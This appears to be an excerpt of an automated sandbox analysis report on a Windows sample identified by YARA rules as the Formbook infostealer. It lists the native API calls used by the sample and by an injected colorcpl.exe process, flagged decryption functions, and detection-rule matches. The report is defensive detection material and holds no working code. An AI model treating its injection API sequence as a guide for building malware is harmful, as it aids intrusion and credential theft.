Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_004181B0 NtCreateFile, 2_2_004181B0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_00418260 NtReadFile, 2_2_00418260
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_004182E0 NtClose, 2_2_004182E0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_00418390 NtAllocateVirtualMemory, 2_2_00418390
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_004182AC NtReadFile, 2_2_004182AC
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_0041838B NtAllocateVirtualMemory, 2_2_0041838B
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013E9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 2_2_013E9910
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013E9540 NtReadFile,LdrInitializeThunk, 2_2_013E9540
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013E99A0 NtCreateSection,LdrInitializeThunk, 2_2_013E99A0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013E95D0 NtClose,LdrInitializeThunk, 2_2_013E95D0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013E9860 NtQuerySystemInformation,LdrInitializeThunk, 2_2_013E9860
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013E9840 NtDelayExecution,LdrInitializeThunk, 2_2_013E9840
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013E98F0 NtReadVirtualMemory,LdrInitializeThunk, 2_2_013E98F0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013E9710 NtQueryInformationToken,LdrInitializeThunk, 2_2_013E9710
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013E97A0 NtUnmapViewOfSection,LdrInitializeThunk, 2_2_013E97A0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013E9780 NtMapViewOfSection,LdrInitializeThunk, 2_2_013E9780
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013E9FE0 NtCreateMutant,LdrInitializeThunk, 2_2_013E9FE0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013E9A20 NtResumeThread,LdrInitializeThunk, 2_2_013E9A20
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013E9A00 NtProtectVirtualMemory,LdrInitializeThunk, 2_2_013E9A00
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013E9660 NtAllocateVirtualMemory,LdrInitializeThunk, 2_2_013E9660
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013E9A50 NtCreateFile,LdrInitializeThunk, 2_2_013E9A50
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013E96E0 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_013E96E0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013EAD30 NtSetContextThread, 2_2_013EAD30
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013E9520 NtWaitForSingleObject, 2_2_013E9520
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013E9560 NtWriteFile, 2_2_013E9560
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013E9950 NtQueueApcThread, 2_2_013E9950
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013E95F0 NtQueryInformationFile, 2_2_013E95F0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013E99D0 NtCreateProcessEx, 2_2_013E99D0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013E9820 NtEnumerateKey, 2_2_013E9820
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013EB040 NtSuspendThread, 2_2_013EB040
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013E98A0 NtWriteVirtualMemory, 2_2_013E98A0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013E9730 NtQueryVirtualMemory, 2_2_013E9730
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013EA710 NtOpenProcessToken, 2_2_013EA710
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013E9B00 NtSetValueKey, 2_2_013E9B00
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013E9770 NtSetInformationFile, 2_2_013E9770
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013EA770 NtOpenThread, 2_2_013EA770
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013E9760 NtOpenProcess, 2_2_013E9760
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013EA3B0 NtGetContextThread, 2_2_013EA3B0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013E9610 NtEnumerateValueKey, 2_2_013E9610
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013E9A10 NtQuerySection, 2_2_013E9A10
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013E9670 NtQueryInformationProcess, 2_2_013E9670
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013E9650 NtQueryValueKey, 2_2_013E9650
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013E9A80 NtOpenDirectoryObject, 2_2_013E9A80
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013E96D0 NtCreateKey, 2_2_013E96D0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04739540 NtReadFile,LdrInitializeThunk, 15_2_04739540
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047395D0 NtClose,LdrInitializeThunk, 15_2_047395D0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04739660 NtAllocateVirtualMemory,LdrInitializeThunk, 15_2_04739660
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04739650 NtQueryValueKey,LdrInitializeThunk, 15_2_04739650
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047396E0 NtFreeVirtualMemory,LdrInitializeThunk, 15_2_047396E0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047396D0 NtCreateKey,LdrInitializeThunk, 15_2_047396D0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04739710 NtQueryInformationToken,LdrInitializeThunk, 15_2_04739710
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04739FE0 NtCreateMutant,LdrInitializeThunk, 15_2_04739FE0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04739780 NtMapViewOfSection,LdrInitializeThunk, 15_2_04739780
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04739860 NtQuerySystemInformation,LdrInitializeThunk, 15_2_04739860
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04739840 NtDelayExecution,LdrInitializeThunk, 15_2_04739840
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04739910 NtAdjustPrivilegesToken,LdrInitializeThunk, 15_2_04739910
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047399A0 NtCreateSection,LdrInitializeThunk, 15_2_047399A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04739A50 NtCreateFile,LdrInitializeThunk, 15_2_04739A50
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04739560 NtWriteFile, 15_2_04739560
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0473AD30 NtSetContextThread, 15_2_0473AD30
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04739520 NtWaitForSingleObject, 15_2_04739520
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047395F0 NtQueryInformationFile, 15_2_047395F0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04739670 NtQueryInformationProcess, 15_2_04739670
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04739610 NtEnumerateValueKey, 15_2_04739610
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0473A770 NtOpenThread, 15_2_0473A770
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04739770 NtSetInformationFile, 15_2_04739770
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04739760 NtOpenProcess, 15_2_04739760
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04739730 NtQueryVirtualMemory, 15_2_04739730
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0473A710 NtOpenProcessToken, 15_2_0473A710
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047397A0 NtUnmapViewOfSection, 15_2_047397A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0473B040 NtSuspendThread, 15_2_0473B040
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04739820 NtEnumerateKey, 15_2_04739820
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047398F0 NtReadVirtualMemory, 15_2_047398F0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047398A0 NtWriteVirtualMemory, 15_2_047398A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04739950 NtQueueApcThread, 15_2_04739950
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047399D0 NtCreateProcessEx, 15_2_047399D0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04739A20 NtResumeThread, 15_2_04739A20
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04739A10 NtQuerySection, 15_2_04739A10
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04739A00 NtProtectVirtualMemory, 15_2_04739A00
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04739A80 NtOpenDirectoryObject, 15_2_04739A80
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04739B00 NtSetValueKey, 15_2_04739B00
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0473A3B0 NtGetContextThread, 15_2_0473A3B0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02558260 NtReadFile, 15_2_02558260
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_025582E0 NtClose, 15_2_025582E0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02558390 NtAllocateVirtualMemory, 15_2_02558390
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_025581B0 NtCreateFile, 15_2_025581B0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_025582AC NtReadFile, 15_2_025582AC
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0255838B NtAllocateVirtualMemory, 15_2_0255838B
Detected potential crypto function
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 1_2_006EA90E 1_2_006EA90E
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 1_2_006E63D1 1_2_006E63D1
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 1_2_02B0C2B0 1_2_02B0C2B0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 1_2_02B09970 1_2_02B09970
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 1_2_08B77A60 1_2_08B77A60
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 1_2_08B7AD18 1_2_08B7AD18
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 1_2_08B7BF50 1_2_08B7BF50
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 1_2_08B7B588 1_2_08B7B588
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 1_2_08B7E850 1_2_08B7E850
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 1_2_08B7BA38 1_2_08B7BA38
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 1_2_08B7BA28 1_2_08B7BA28
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 1_2_08B77A51 1_2_08B77A51
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 1_2_08B7DC68 1_2_08B7DC68
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 1_2_08B7AC5F 1_2_08B7AC5F
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 1_2_08B7EEF0 1_2_08B7EEF0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 1_2_08B7AFB0 1_2_08B7AFB0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 1_2_08B7AFC0 1_2_08B7AFC0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 1_2_08B7BF42 1_2_08B7BF42
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 1_2_08B7A0F9 1_2_08B7A0F9
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 1_2_08B70006 1_2_08B70006
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 1_2_08B70040 1_2_08B70040
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 1_2_08B7A108 1_2_08B7A108
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 1_2_08B7F148 1_2_08B7F148
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 1_2_08B7F3D8 1_2_08B7F3D8
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 1_2_08B774B0 1_2_08B774B0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 1_2_08B774A0 1_2_08B774A0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 1_2_08B7B578 1_2_08B7B578
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 1_2_0E618872 1_2_0E618872
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 1_2_0E61A830 1_2_0E61A830
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 1_2_0E618668 1_2_0E618668
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 1_2_0E613678 1_2_0E613678
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 1_2_0E618678 1_2_0E618678
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 1_2_0E61365D 1_2_0E61365D
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 1_2_0E615AE0 1_2_0E615AE0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 1_2_0E615AD2 1_2_0E615AD2
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 1_2_0E6182A0 1_2_0E6182A0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 1_2_0E618290 1_2_0E618290
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_00401030 2_2_00401030
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_0041B8B1 2_2_0041B8B1
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_0041B963 2_2_0041B963
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_00408C4B 2_2_00408C4B
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_00408C50 2_2_00408C50
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_0041B493 2_2_0041B493
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_0041B496 2_2_0041B496
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_0041C539 2_2_0041C539
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_00402D89 2_2_00402D89
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_00402D90 2_2_00402D90
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_0041CE85 2_2_0041CE85
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_0041BF12 2_2_0041BF12
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_0041C795 2_2_0041C795
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_00402FB0 2_2_00402FB0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_0086A90E 2_2_0086A90E
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_008663D1 2_2_008663D1
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_01471D55 2_2_01471D55
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013A0D20 2_2_013A0D20
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013C4120 2_2_013C4120
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013AF900 2_2_013AF900
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_01472D07 2_2_01472D07
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_014725DD 2_2_014725DD
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013D2581 2_2_013D2581
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013BD5E0 2_2_013BD5E0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013B841F 2_2_013B841F
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_01461002 2_2_01461002
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013D20A0 2_2_013D20A0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013BB090 2_2_013BB090
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_014728EC 2_2_014728EC
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_014720A8 2_2_014720A8
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_01472B28 2_2_01472B28
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013DEBB0 2_2_013DEBB0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_0146DBD2 2_2_0146DBD2
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_01471FF1 2_2_01471FF1
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013C6E30 2_2_013C6E30
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_01472EF7 2_2_01472EF7
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_014722AE 2_2_014722AE
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047BD466 15_2_047BD466
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0470841F 15_2_0470841F
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047C1D55 15_2_047C1D55
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_046F0D20 15_2_046F0D20
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047C2D07 15_2_047C2D07
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0470D5E0 15_2_0470D5E0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047C25DD 15_2_047C25DD
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04722581 15_2_04722581
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04716E30 15_2_04716E30
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047BD616 15_2_047BD616
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047C2EF7 15_2_047C2EF7
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047C1FF1 15_2_047C1FF1
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047CDFCE 15_2_047CDFCE
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047CE824 15_2_047CE824
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047B1002 15_2_047B1002
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047C28EC 15_2_047C28EC
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047220A0 15_2_047220A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047C20A8 15_2_047C20A8
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0470B090 15_2_0470B090
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04714120 15_2_04714120
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_046FF900 15_2_046FF900
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047AFA2B 15_2_047AFA2B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047C22AE 15_2_047C22AE
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047C2B28 15_2_047C2B28
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047B03DA 15_2_047B03DA
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047BDBD2 15_2_047BDBD2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0472EBB0 15_2_0472EBB0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0255B8B1 15_2_0255B8B1
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0255B954 15_2_0255B954
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0255CE85 15_2_0255CE85
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0255BF12 15_2_0255BF12
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0255C795 15_2_0255C795
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02542FB0 15_2_02542FB0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02548C50 15_2_02548C50
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02548C4B 15_2_02548C4B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0255B496 15_2_0255B496
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0255B493 15_2_0255B493
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0255C539 15_2_0255C539
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02542D90 15_2_02542D90
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02542D89 15_2_02542D89
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 046FB150 appears 45 times
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: String function: 013AB150 appears 35 times
Sample file is different than original file name gathered from version info
Source: UOMp9cDcqZ.exe Binary or memory string: OriginalFilename vs UOMp9cDcqZ.exe
Source: UOMp9cDcqZ.exe, 00000001.00000002.256636609.0000000008D10000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameDSASignature.dll@ vs UOMp9cDcqZ.exe
Source: UOMp9cDcqZ.exe, 00000001.00000002.256510842.0000000008A20000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemscorrc.dllT vs UOMp9cDcqZ.exe
Source: UOMp9cDcqZ.exe Binary or memory string: OriginalFilename vs UOMp9cDcqZ.exe
Source: UOMp9cDcqZ.exe, 00000002.00000002.315793832.0000000001353000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamecolorcpl.exej% vs UOMp9cDcqZ.exe
Source: UOMp9cDcqZ.exe, 00000002.00000002.316166419.000000000162F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs UOMp9cDcqZ.exe
Source: UOMp9cDcqZ.exe Binary or memory string: OriginalFilenameOrderablePartitioner.exeZ vs UOMp9cDcqZ.exe
Uses 32bit PE files
Source: UOMp9cDcqZ.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 00000002.00000000.245316233.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000000.245316233.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.494486167.0000000004490000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.494486167.0000000004490000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.315392989.0000000000DE0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.315392989.0000000000DE0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.492679624.0000000002540000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.492679624.0000000002540000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.314958304.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.314958304.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.249409272.0000000003B69000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.249409272.0000000003B69000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.315613623.0000000000EF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.315613623.0000000000EF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
